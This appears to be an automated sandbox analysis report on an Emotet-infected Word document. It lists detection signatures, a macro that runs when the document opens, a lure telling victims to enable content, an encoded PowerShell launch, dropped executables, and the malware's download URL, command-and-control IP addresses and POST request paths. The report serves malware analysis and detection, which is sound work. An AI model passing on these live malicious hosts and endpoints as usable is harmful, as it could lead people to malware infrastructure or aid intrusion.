Analysis Report REP_YFTCM6TNB.doc

Overview

General Information

Sample Name: REP_YFTCM6TNB.doc
Analysis ID: 299650
MD5: ca9c0ac1e075a343fb2986772d0ae15b
SHA1: 4bb683d5490dba99a390f17e3f9c8839056d03e9
SHA256: 83af4eee8013969fd28932937f24ed1bb6031013a525dcd161ed6914b41feba5

Detection

Emotet
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Emotet
Creates processes via WMI
Drops executables to the windows directory (C:\Windows) and starts them
Encrypted powershell cmdline option found
Hides that the sample has been downloaded from the Internet (zone.identifier)
Machine Learning detection for dropped file
Machine Learning detection for sample
PowerShell case anomaly found
Powershell drops PE file
Very long command line found
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Antivirus or Machine Learning detection for unpacked file
Contains capabilities to detect virtual machines
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Contains functionality to enumerate running services
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains strange resources
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

AV Detection:

Antivirus detection for URL or domain
Source: http://wiwildcare.org/wp-includes/Ri/ Avira URL Cloud: Label: malware
Found malware configuration
Source: 00000005.00000002.2348565916.00000000003C4000.00000004.00000001.sdmp Malware Configuration Extractor: Emotet
Multi AV Scanner detection for submitted file
Source: REP_YFTCM6TNB.doc Virustotal: Detection: 53%
Machine Learning detection for dropped file
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Joe Sandbox ML: detected
Machine Learning detection for sample
Source: REP_YFTCM6TNB.doc Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 4.2.Ay8g9b.exe.3c0000.0.unpack Avira: Label: TR/Dropper.Gen
Source: 5.2.KBDFA.exe.3e0000.0.unpack Avira: Label: TR/Dropper.Gen

Cryptography:

Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Windows\SysWOW64\spopk\KBDFA.exe Code function: 5_2_003E2580 CryptImportKey,LocalFree,CryptCreateHash,CryptGenKey,CryptAcquireContextW,CryptDecodeObjectEx,CryptDecodeObjectEx,GetProcessHeap,RtlAllocateHeap, 5_2_003E2580
Source: C:\Windows\SysWOW64\spopk\KBDFA.exe Code function: 5_2_003E2240 CryptDestroyHash,CryptGetHashParam,CryptExportKey,CryptEncrypt,memcpy,CryptDuplicateHash, 5_2_003E2240
Source: C:\Windows\SysWOW64\spopk\KBDFA.exe Code function: 5_2_003E1FC0 CryptDuplicateHash,memcpy,CryptDestroyHash, 5_2_003E1FC0
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_003C37E0 FindFirstFileW,GetProcessHeap,GetProcessHeap,FindNextFileW, 4_2_003C37E0
Source: C:\Windows\SysWOW64\spopk\KBDFA.exe Code function: 5_2_003E37E0 FindFirstFileW,FindFirstFileW,_snwprintf,GetProcessHeap,HeapFree,_snwprintf,GetProcessHeap,HeapFree,FindNextFileW,FindNextFileW,FindClose, 5_2_003E37E0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini

Software Vulnerabilities:

Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: wiwildcare.org
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 199.250.198.199:80
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 199.250.198.199:80

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2404310 ET CNC Feodo Tracker Reported CnC Server TCP group 6 192.168.2.22:49169 -> 169.50.76.149:8080
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 167.114.153.111:8080
Source: global traffic TCP traffic: 192.168.2.22:49169 -> 169.50.76.149:8080
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /wp-includes/Ri/ HTTP/1.1Host: wiwildcare.orgConnection: Keep-Alive
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 199.250.198.199 199.250.198.199
Source: Joe Sandbox View IP Address: 208.180.207.205 208.180.207.205
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: SOFTLAYERUS SOFTLAYERUS
Source: Joe Sandbox View ASN Name: SUDDENLINK-COMMUNICATIONSUS SUDDENLINK-COMMUNICATIONSUS
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: POST /mr8v3zdEO6ruCbLbKue/i5hjth/RG2GfXJ6iUx/DWqEY0/4vWA6dPh4paaj8RZSBf/8V9ygZzkDyLCW/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Encoding: gzip, deflateDNT: 1Connection: keep-aliveReferer: 167.114.153.111/Upgrade-Insecure-Requests: 1Content-Type: multipart/form-data; boundary=-----------------------wx7idGrrtMeBf51kS4mBsf9User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 167.114.153.111:8080Content-Length: 4436Cache-Control: no-cache
Source: unknown TCP traffic detected without corresponding DNS query: 208.180.207.205
Source: unknown TCP traffic detected without corresponding DNS query: 167.114.153.111
Source: unknown TCP traffic detected without corresponding DNS query: 169.50.76.149
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{B65283D3-1CF8-4E74-AA78-05F4F57053A0}.tmp
Source: global traffic HTTP traffic detected: GET /wp-includes/Ri/ HTTP/1.1Host: wiwildcare.orgConnection: Keep-Alive
Source: unknown DNS traffic detected: queries for: wiwildcare.org
Source: unknown HTTP traffic detected: POST /mr8v3zdEO6ruCbLbKue/i5hjth/RG2GfXJ6iUx/DWqEY0/4vWA6dPh4paaj8RZSBf/8V9ygZzkDyLCW/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Encoding: gzip, deflateDNT: 1Connection: keep-aliveReferer: 167.114.153.111/Upgrade-Insecure-Requests: 1Content-Type: multipart/form-data; boundary=-----------------------wx7idGrrtMeBf51kS4mBsf9User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 167.114.153.111:8080Content-Length: 4436Cache-Control: no-cache
Source: KBDFA.exe, 00000005.00000002.2348952042.0000000002020000.00000004.00000001.sdmp String found in binary or memory: http://169.50.76.149:8080/95LWM5J/KhAnxoDnDe3M/
Source: Ay8g9b.exe, 00000004.00000002.2100145846.0000000002580000.00000002.00000001.sdmp, KBDFA.exe, 00000005.00000002.2349330527.00000000032C0000.00000002.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: Ay8g9b.exe, 00000004.00000002.2100145846.0000000002580000.00000002.00000001.sdmp, KBDFA.exe, 00000005.00000002.2349330527.00000000032C0000.00000002.00000001.sdmp String found in binary or memory: http://www.%s.comPA

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Potential key logger detected (key state polling based)
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_00405289 GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageW, 4_2_00405289

E-Banking Fraud:

Yara detected Emotet
Source: Yara match File source: 00000005.00000002.2348565916.00000000003C4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2099123860.00000000002A4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2099093530.0000000000280000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2099228616.00000000003C1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2348537457.00000000003A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2348586235.00000000003E1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 4.2.Ay8g9b.exe.3c0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.KBDFA.exe.3e0000.0.unpack, type: UNPACKEDPE
Source: C:\Windows\SysWOW64\spopk\KBDFA.exe Code function: 5_2_003E2580 CryptImportKey,LocalFree,CryptCreateHash,CryptGenKey,CryptAcquireContextW,CryptDecodeObjectEx,CryptDecodeObjectEx,GetProcessHeap,RtlAllocateHeap, 5_2_003E2580

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Document image extraction number: 0 Screenshot OCR: Enable Editing and then click EnableContent
Source: Document image extraction number: 1 Screenshot OCR: Enable Editing and then click EnableContert
Powershell drops PE file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe
Very long command line found
Source: unknown Process created: Commandline size = 5411
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\spopk\KBDFA.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\spopk\KBDFA.exe Memory allocated: 76D20000 page execute and read and write
Creates files inside the system directory
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe File created: C:\Windows\SysWOW64\spopk\
Detected potential crypto function
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_0041604F 4_2_0041604F
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_00411144 4_2_00411144
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_0041F22E 4_2_0041F22E
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_0041048F 4_2_0041048F
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_00411564 4_2_00411564
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_0041F772 4_2_0041F772
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_00410964 4_2_00410964
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_00421A5E 4_2_00421A5E
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_00406AFA 4_2_00406AFA
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_0041ECEA 4_2_0041ECEA
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_00410D38 4_2_00410D38
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_0041FE6A 4_2_0041FE6A
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_003C81B0 4_2_003C81B0
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_003C7DD0 4_2_003C7DD0
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_003C6500 4_2_003C6500
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_003C7560 4_2_003C7560
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_003C3AF0 4_2_003C3AF0
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_003C3C10 4_2_003C3C10
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_003C1C90 4_2_003C1C90
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_003C3DF0 4_2_003C3DF0
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_003C3E17 4_2_003C3E17
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_0028382E 4_2_0028382E
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_0028809E 4_2_0028809E
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_002890FE 4_2_002890FE
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_0028996E 4_2_0028996E
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_002859B5 4_2_002859B5
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_0028598E 4_2_0028598E
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_00289D4E 4_2_00289D4E
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_0028568E 4_2_0028568E
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_002857AE 4_2_002857AE
Source: C:\Windows\SysWOW64\spopk\KBDFA.exe Code function: 5_2_003E81B0 5_2_003E81B0
Source: C:\Windows\SysWOW64\spopk\KBDFA.exe Code function: 5_2_003E3E17 5_2_003E3E17
Source: C:\Windows\SysWOW64\spopk\KBDFA.exe Code function: 5_2_003E3C10 5_2_003E3C10
Source: C:\Windows\SysWOW64\spopk\KBDFA.exe Code function: 5_2_003E6500 5_2_003E6500
Source: C:\Windows\SysWOW64\spopk\KBDFA.exe Code function: 5_2_003E7560 5_2_003E7560
Source: C:\Windows\SysWOW64\spopk\KBDFA.exe Code function: 5_2_003E1C90 5_2_003E1C90
Source: C:\Windows\SysWOW64\spopk\KBDFA.exe Code function: 5_2_003E3AF0 5_2_003E3AF0
Source: C:\Windows\SysWOW64\spopk\KBDFA.exe Code function: 5_2_003E3DF0 5_2_003E3DF0
Source: C:\Windows\SysWOW64\spopk\KBDFA.exe Code function: 5_2_003E7DD0 5_2_003E7DD0
Source: C:\Windows\SysWOW64\spopk\KBDFA.exe Code function: 5_2_003A382E 5_2_003A382E
Source: C:\Windows\SysWOW64\spopk\KBDFA.exe Code function: 5_2_003A809E 5_2_003A809E
Source: C:\Windows\SysWOW64\spopk\KBDFA.exe Code function: 5_2_003A568E 5_2_003A568E
Source: C:\Windows\SysWOW64\spopk\KBDFA.exe Code function: 5_2_003A90FE 5_2_003A90FE
Source: C:\Windows\SysWOW64\spopk\KBDFA.exe Code function: 5_2_003A996E 5_2_003A996E
Source: C:\Windows\SysWOW64\spopk\KBDFA.exe Code function: 5_2_003A9D4E 5_2_003A9D4E
Source: C:\Windows\SysWOW64\spopk\KBDFA.exe Code function: 5_2_003A59B5 5_2_003A59B5
Source: C:\Windows\SysWOW64\spopk\KBDFA.exe Code function: 5_2_003A57AE 5_2_003A57AE
Source: C:\Windows\SysWOW64\spopk\KBDFA.exe Code function: 5_2_003A598E 5_2_003A598E
Document contains an embedded VBA macro which executes code when the document is opened / closed
Source: REP_YFTCM6TNB.doc OLE, VBA macro line: Private Sub Document_open()
Source: VBA code instrumentation OLE, VBA macro: Module Zm360615gr5, Function Document_open Name: Document_open
Document contains embedded VBA macros
Source: REP_YFTCM6TNB.doc OLE indicator, VBA macros: true
Found potential string decryption / allocating functions
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: String function: 0040FF83 appears 89 times
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: String function: 00410090 appears 56 times
PE file contains strange resources
Source: Ay8g9b.exe.2.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Yara signature match
Source: 00000005.00000002.2348727506.0000000000800000.00000002.00000001.sdmp, type: MEMORY Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: Ay8g9b.exe, 00000004.00000002.2099093530.0000000000280000.00000040.00000001.sdmp, KBDFA.exe, 00000005.00000003.2099150901.00000000003EF000.00000004.00000001.sdmp Binary or memory string: IrdaMobile.sln
Source: Ay8g9b.exe, 00000004.00000002.2099093530.0000000000280000.00000040.00000001.sdmp, KBDFA.exe, 00000005.00000003.2099150901.00000000003EF000.00000004.00000001.sdmp Binary or memory string: IrdaMobile.slnPK
Source: classification engine Classification label: mal100.troj.evad.winDOC@5/8@1/4
Source: C:\Windows\SysWOW64\spopk\KBDFA.exe Code function: 5_2_003E4B60 Process32NextW,Process32FirstW,CreateToolhelp32Snapshot,CreateToolhelp32Snapshot,CloseHandle,CloseHandle, 5_2_003E4B60
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_00402743 LoadResource,LockResource,SizeofResource, 4_2_00402743
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_003C4F20 EnumServicesStatusExW,GetTickCount,ChangeServiceConfig2W,OpenServiceW,OpenServiceW,CloseServiceHandle,GetProcessHeap,GetProcessHeap,GetProcessHeap,RtlAllocateHeap,GetProcessHeap, 4_2_003C4F20
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\Desktop\~$P_YFTCM6TNB.doc
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\CVRCBE6.tmp
Source: REP_YFTCM6TNB.doc OLE indicator, Word Document stream: true
Source: REP_YFTCM6TNB.doc OLE document summary: edited time not present or 0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.....................!.j....@Ns.............................}..v.....&......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................L!.j....p'..............................}..v.....'......0................Ks............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.....................!.j....@Ns.............................}..v............0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................L!.j....p/..............................}..v...../......0................Ks............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....'................!.j....@Ns.............................}..v.....6......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....'...............L!.j....p7..............................}..v.....7......0................Ks............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....3................!.j....@Ns.............................}..v.....>......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....3...............L!.j....p?..............................}..v.....?......0................Ks............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....?................!.j....@Ns.............................}..v.....F......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....?...............L!.j....pG..............................}..v.....G......0................Ks............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....K................!.j....@Ns.............................}..v.....N......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....K...............L!.j....pO..............................}..v.....O......0................Ks............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....W................!.j....@Ns.............................}..v.....V......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....W...............L!.j....pW..............................}..v.....W......0................Ks............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....c................!.j....@Ns.............................}..v.....^......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....c...............L!.j....p_..............................}..v....._......0................Ks............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....o................!.j....@Ns.............................}..v.....f......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....o...............L!.j....pg..............................}..v.....g......0................Ks............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....{................!.j....@Ns.............................}..v.....n......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....{...............L!.j....po..............................}..v.....o......0................Ks............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.....................!.j....@Ns.............................}..v.....v......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................L!.j....pw..............................}..v.....w......0................Ks............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.....................!.j....@Ns.............................}..v.....~......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................L!.j....p...............................}..v............0................Ks............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.....................!.j....@Ns.............................}..v.... .......0.......................b....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................L!.j....................................}..v....X.......0................Ks............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.....................!.j....@Ns.............................}..v............0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................L!.j....................................}..v....8.......0................Ks............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.....................!.j....@Ns.............................}..v............0.......................r....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................L!.j....@...............................}..v............0................Ks............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v............ ........!.j....@Ns.............................}..v....P.......0................Js............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................L!.j....................................}..v............0................Ks............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.....RG.............................}..v....`9......0...............8.s............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: __GENUS          : 2 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: __CLASS          : __PARAMETERS Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: __SUPERCLASS     : Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: __DYNASTY        : __PARAMETERS Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: __RELPATH        : Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: __PROPERTY_COUNT : 2 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: __DERIVATION     : {} Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: __SERVER         : Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: __NAMESPACE      : Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: __PATH           : Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ProcessId        : 2788 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ReturnValue      : 0 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\spopk\KBDFA.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\spopk\KBDFA.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: REP_YFTCM6TNB.doc Virustotal: Detection: 53%
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -ENCOD 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
Source: unknown Process created: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe
Source: unknown Process created: C:\Windows\SysWOW64\spopk\KBDFA.exe C:\Windows\SysWOW64\spopk\KBDFA.exe
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Process created: C:\Windows\SysWOW64\spopk\KBDFA.exe C:\Windows\SysWOW64\spopk\KBDFA.exe Jump to behavior
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32 Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Window found: window name: SysTabControl32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
